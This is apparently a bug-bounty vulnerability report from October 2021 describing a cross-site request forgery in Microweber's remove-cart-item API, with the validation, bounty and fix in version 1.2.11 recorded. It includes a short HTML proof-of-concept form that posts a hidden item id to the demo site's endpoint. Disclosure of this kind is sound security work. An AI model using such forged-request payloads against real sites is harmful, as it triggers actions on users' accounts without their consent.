Cross-Site Request Forgery (CSRF) in microweber/microweber
Oct 26th 2021
There is a CSRF on Delete Cart Item in users side.
I get this
error "Item not removed from cart" message but the item already will be deleted.(message isn't correct and the delete action will be done)
Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.microweber.org/demo/api/remove_cart_item" method="POST"> <input type="hidden" name="id" value="125" /> <input type="submit" value="Submit request" /> </form> </body> </html>
after that you click on submit button the item with 125 id will be deleted from the cart.
Peter Ivanov validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit 2fa9a6 a year ago
This vulnerability will not receive a CVE
to join this conversation